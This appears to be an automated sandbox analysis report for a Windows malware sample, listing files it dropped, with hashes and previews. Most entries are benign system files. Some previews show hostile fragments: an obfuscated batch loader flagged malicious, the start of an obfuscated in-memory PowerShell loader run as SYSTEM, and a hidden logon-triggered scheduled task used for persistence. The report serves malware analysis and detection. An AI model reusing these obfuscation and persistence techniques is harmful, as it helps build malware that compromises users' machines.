                            MD5:D689C25F0EDEEC305A2F2409A351E182
                            SHA1:BD5874971D56F1ED49E405FF4FAFD25F323BD41A
                            SHA-256:29A8A13B5957E5011C76C9CF249DBB7B8110C1761401021B29D135B11232D097
                            SHA-512:5FA6A8C21ED92F810CFCBC56A5741C25D7209EFC1E84BB3F8A4600D2F3BAB4FF45DCBAE8677D1943B7F2C8DC94A431890ACC6F5CF2F50911E36D80926BB21A34
                            Malicious:false
                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3bbo2kri.le0.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qgxuuvs.0li.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b32b30w1.tgj.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5r0ihk5.kzs.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_squa0cl3.qra.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uy1ul2eh.yqr.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Roaming\$nya-Logs\2024-10-04

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:DOS executable (COM, 0x8C-variant)
                            Category:modified
                            Size (bytes):352
                            Entropy (8bit):7.415109904127954
                            Encrypted:false
                            SSDEEP:6:iAxVJnCsMCy4a66fS8D7EeYuzRZB4fUHs1+gG7iMn4R4jGmSpvh7cV+U:/c5CyFdPHPzF4fUHsAgGGMn4R4jTgJ1U
                            MD5:FE5F105C5FE691A4724079A34C3FD002
                            SHA1:607724412F46E8221F65C2869DF87E7CAA5D288A
                            SHA-256:A6848E3050D90F07544F46CAE503C87A3A3D73E18858D2A60D7D1BF977955096
                            SHA-512:12C60C98B656524FFD488839E5B3A8B594E553C95E0DC796782CAEEB8D86C0A8C75F9385B735DE22C8D78E2E38F0CC1BBDBB4D72AA83833A9641A51D6EAD032C
                            Malicious:false
                            Preview:.<....].q...w..6I+N..j......J.A}.. -..|.J.........M..~bS%.&..E;I.Uf._G..:........\*.T...._..aOl..^..Y8|...g..&.-....Ys.....B.AI6......Sq..Qlp.#&...o...p...p*.."...x.j.1C.P.0....4....+ea'..US[............a.....T.f.U_0...>...H...I.{7G..^..?.6.3.9i9....X...5...4..u...E.v:.....wb.7......qXj.nu.e),....t!,0..Q..."..+Mq|p.....W6...+.C...pl...m.V

                            C:\Users\user\Documents\20241004\PowerShell_transcript.128757.CxMBvNgr.20241004034233.txt

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4553
                            Entropy (8bit):5.349222050408134
                            Encrypted:false
                            SSDEEP:96:BZtsZ+NTyyqo1ZhZ9sZ+NTyyqo1Z0povTueovTuuZMsZ+NTyyqo1ZppovTueovTV:0EBEK
                            MD5:784CCEAD8246F1D9B0B0233774243374
                            SHA1:05C1B6AB474713446F3310C5463A8BB5CD0FBD08
                            SHA-256:94F81DCB3AA9BF4A2E7261F0735FBB15445C9F72AA3CDEE6E6D7006D898A7CA2
                            SHA-512:093EC3633FDCCBAE61C3DEA292499ADBC9490DEFF9D134C5D19925D4BAE5E14690778FCD00D139B9BF27E46C475E417DB5C5A81D90D1F1EAF4EC442C3D12E7E7
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034233..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 5216..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241004034303..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 5216..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1

                            C:\Users\user\Documents\20241004\PowerShell_transcript.128757.UJcpkVmk.20241004034203.txt

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (2684), with CRLF line terminators
                            Category:dropped
                            Size (bytes):5117
                            Entropy (8bit):5.637283607772319
                            Encrypted:false
                            SSDEEP:96:BZGsZ+NTryqo1ZhZOsZ+NTryqo1ZfpovTueovTukVt7vBpB6a5xY595f8bus3wMp:9E653b5xY595f7s3wMcjIiIIit
                            MD5:141D50A8BBC12D18153D981E74F7421B
                            SHA1:229EFFB65263021AA2609644FC85BC7DCC1886FD
                            SHA-256:6BD9C223DF78316DB7E1C4D348D1B1C5E61CB97F0B01B9807C41AD3B34B3D59C
                            SHA-512:DB76B41B4BCEB8FA968CD4E76FF426FC23E9110F6A2C0D1E0BDF32A0309B709E12DD2510C01D9EAAAD0E9B3FEC0FC9BF6AF365215835F98EAB796544D9C824F4
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034203..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 1284..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241004034311..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 1284..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1

                            C:\Users\user\Documents\20241004\PowerShell_transcript.128757.hSiBdkli.20241004034257.txt

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (2692), with CRLF line terminators
                            Category:dropped
                            Size (bytes):5125
                            Entropy (8bit):5.642366220416972
                            Encrypted:false
                            SSDEEP:96:BZ/sZ+NTUyqo1ZhZNZsZ+NTUyqo1ZOpovTueovTuOVt7vBpB6a5xY595f8bus3wJ:5AEY53b5xY595f7s3wM5IiIIit
                            MD5:3AD5707222C23F76FFDF0619C8AC6D25
                            SHA1:453EA743B95692E13F665F8F0EC46B3BBBAA0C4D
                            SHA-256:EBA01D3DF9AF7A904BB764BBA987782A74E2252D9F315D5EFFC6304FDB2E6288
                            SHA-512:08A607B366A901B62CD32BE7DDC373CDC33ABFFA16BF3A90783C87B301DE2DA4F59B8F9E594BAE0FAC150CB409EE8A02DCEC178E850660F358FC45DFA999A677
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034257..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 4828..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1682..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Windows PowerShell transcript start..Start time: 20241004034327..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: powershell.exe -WindowStyle Hidden..Process ID: 4828..PSVersion: 5.1.19041.1682..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1682..BuildVersion: 10.0.19041.1

                            C:\Windows\$rbx-onimai2\$rbx-CO2.bat

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
                            Category:dropped
                            Size (bytes):5214429
                            Entropy (8bit):6.008710946572079
                            Encrypted:false
                            SSDEEP:49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
                            MD5:19FC666F7494D78A55D6B50A0252C214
                            SHA1:8876CD520507CBFDC2E89E449BABA52232A1DF1B
                            SHA-256:E96F8F61E3AF77C429AE6AF54C128F7B8420A45A0A63BDFCACD682773B8E5FC1
                            SHA-512:94DDE8D5D0100E892CA004556B30B8E8FEDACC1E3482DAB9D611BD64569B2F73E29DA93DB2C7AE51585791A4F39D01426EE6663C48602DE92AA74F6EBE3F630A
                            Malicious:true
                            Preview:@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJqyhiYGVWNKJRrYodYeEjAsbrOpYYCWmpWWBUAVhPcsRZmXzGSNYAyIjYxQuJIWtQytUuwtCdXPgiBbfQPsgPYLQoND%%^%c%KAygfZaASdfjylUCJBawwLDTqQERMDGGSXRCzJbjAAmNKiHDdjhNMhaZXEPovjOowyrBurdazRWVyQjijaODwTTLWSFVTMOrMXrlRgiLfhnVkfAguHfuukSCEFECMihNdFjAzXrcScyoGYARryAlGtWBeOHlCGZWZzSF%%^%h%aHwqdBsMDWGeNlnHVgJJHvLqgAmcBpgfVUrReUDSDPARbgOvMpdsjVoEWgkCpqloPAjSTwDbCRfSUToZMRqmlOWZFNUYKaCnDmcBXVBqMcPrQwJdRkQyaZdbDjmgBEqBoSoIRNcQpZAiYEjjeRhzkdnEiaYNIuPhLndYialehajazVdYZdcKxRrlEJAQPohUkswKBlbdFcrjUmfm%%^%o%ZOFseJUWRtyzvoSSoPgytwOcYeuzhqsDnTPACCfIBNJRCEkNyqGwZODCZDtaouOBaVlBzsqLKxWFMWAuUGaQKVEzpmAYjfuhZiRHsIogaUMBRYQddYfIuXRfqMmmRrCEdPFEfSclsUQPjcIrwxVkZLNcrLqFwcoIshybslYkWUpzgcVodVQuvsFrcDntCwPqFixbDHYkzLnfvnWpPb%%^% %BmUmZChYPYEHAeZTXEULwWFVKezVPHYDAUndLWxzwIilUdNawt

                            C:\Windows\$rbx-onimai2\$rbx-CO2.bat:Zone.Identifier

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0

                            C:\Windows\System32\20241004\PowerShell_transcript.128757.tvTEgCNQ.20241004034311.txt

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (5360), with CRLF line terminators
                            Category:dropped
                            Size (bytes):11484
                            Entropy (8bit):5.34259826985146
                            Encrypted:false
                            SSDEEP:192:NIvawYQo0dZcT2IUwB2IvawYQo0dZcT2IUwBS:NIvpYl0oD2IvpYl0oDS
                            MD5:5AD398834C8E25723975DED4B2D02597
                            SHA1:5EA89BAD95268DA60FF5123220E5C6E9592605B4
                            SHA-256:A7E6F5069C4185EC5523D5951C49C9034A91ACC6F367B022A52CB72424CE0558
                            SHA-512:981A90B488F64FBB54CCE44BE5A8361CEE66696D46DA6145DD99BFD5D7D9656D095DAB58EB8CB9BB1BD28C4C95917A9872B66D08E568CF2977603536EA10F659
                            Malicious:false
                            Preview:.**********************..Windows PowerShell transcript start..Start time: 20241004034312..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 128757 (Microsoft Windows NT 10.0.19045.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](10

                            C:\Windows\System32\Tasks\$rbx-QgS1M4PT

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):3488
                            Entropy (8bit):3.5872466257032647
                            Encrypted:false
                            SSDEEP:48:yei1q97SfeQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXI:t2nkp2Gdi3ipVA9ll7EhAMz3cHtr+
                            MD5:3D2655B2FBBD4D24033DBB79B921697C
                            SHA1:08CE2A84327E1EEF614008809F15A9F126B28A05
                            SHA-256:2CFED75D94EC6FC435D61F370CCA3D40E910A8FB10A97D45D51FFEE0F87A7793
                            SHA-512:F261B1727096BBF17F97402A5F7D19C46F5481227E50AD43294C935C13CBB6494F1DD068E2FA5DC26F10926600D2E17289C44785518936C69A5A7670A0D68182
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.4.T.0.4.:.0.1.:.4.7...9.8.9.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.Q.g.S.1.M.4.P.T.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .

                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul4/h:NllU
                            MD5:C31A1BA17DD8856E8E930807FA308CBE
                            SHA1:96AAFF7B013066D2EDA2958128FD049915028849
                            SHA-256:91620CED47374C83D43981E1930EF7C78B6E7651F108F6CB18A60CAE8487E1CF
                            SHA-512:6D6AB14A905EC859D23B2C2BA163A144FB35162AA05CFF85478291C0562085B8569A706B2A7A28CA97C958BE2FC3840CEBA99D212CB317CD5176784B194DAA59
                            Malicious:false
                            Preview:@...e................................."..............@..........

                            C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

                            Download File
                            Process:C:\Windows\System32\wbem\WMIADAP.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):3444
                            Entropy (8bit):5.011954215267298
                            Encrypted:false
                            SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                            MD5:B133A676D139032A27DE3D9619E70091
                            SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                            SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                            SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                            Malicious:false
                            Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                            C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

                            Download File
                            Process:C:\Windows\System32\wbem\WMIADAP.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:modified
                            Size (bytes):950
                            Entropy (8bit):2.8937402169492104
                            Encrypted:false
                            SSDEEP:12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivzivG:Q3wU/IM1x6ozoG
                            MD5:9D007E669CE25371EE9401DC2AC21D2A
                            SHA1:6F0CACCD76F7A94BBCB1124D398E9139E09C6FC4
                            SHA-256:632004D14715476801408FC10E1B119BDC90378D2E8D573B7C14A06816799FA8
                            SHA-512:AB9FEA61D8C00701E402D700873CA2B9A4FFB7D62557A2ED1C86571DCC40D3C33F7B7E358DF506C134EE4ABEE39B1167846C64A34FA19448FD1DC36AF19F579C
                            Malicious:false
                            Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........

                            C:\Windows\System32\winevt\Logs\Application.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):78200
                            Entropy (8bit):4.069487817829082
                            Encrypted:false
                            SSDEEP:768:4k3WxWwWLvOUZucxvbNp8CCcicolb/AjQwEPnPK0xvFk3WxWwW8:dLkctNp8TcG/Ajs7C8
                            MD5:35F5E61B44C99E5961D791D65DD17821
                            SHA1:EEECB77D0C11E84E03F3A3D8D32DA60B0C425431
                            SHA-256:B6B776F4A27841D857B1CC867F758A0616F9774142F2A55DDB3A2440934D6BA3
                            SHA-512:69772C98E379465695ED3970FF245780716E8EB877E4B7211A731953777555A7F40402DAFB05B541C53508CB3411C60C3F95EB1025E177A3D249BEF5CD15BDEF
                            Malicious:false
                            Preview:ElfChnk.................r.......w...............@.............................................................................(.............$...............................=...................................................................................K.......$...............................m...............F...........................t...................M...c...........................n.......................................................................................&...............................**......v........B..1............g&.....................................................................................!...d..............B..1...........v..............w.)Cn...................p.o.w.e.r.s.h.e.l.l...e.x.e...1.0...0...1.9.0.4.1...5.4.6...7.e.d.a.4.1.1.5...u.n.k.n.o.w.n...0...0...0...0...0.0.0.0.0.0.0.0...0.0.0.0.0.0.0.0...0.0.0.0.7.f.f.d.9.b.b.d.1.c.6.3...1.2.d.c...0.1.d.b.1.6.3.1.0.7.6.1.1.4.d.f...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l

                            C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.2559303785119753
                            Encrypted:false
                            SSDEEP:384:8he6UHi2uepX7xasnPC3FzFtpFDhFPFyF8422:8VUHiapX7xadptrDT9W84N
                            MD5:8EF6E9746DE72295DFCB3197A49966C3
                            SHA1:3FF34508B83382569DF87C14DDFF8596D1E29980
                            SHA-256:BEBF782FCDAD337843593DEE32D030C922424367A50078E30329BE63259E648A
                            SHA-512:0F0690586ACE4A7D37D948805FD2464D8ED5A1B42CE42F68F607072B5836B7CB2032F468FC1C1E921C8FB097694DDD3BE2821D193B73E5552A45F253816DB513
                            Malicious:false
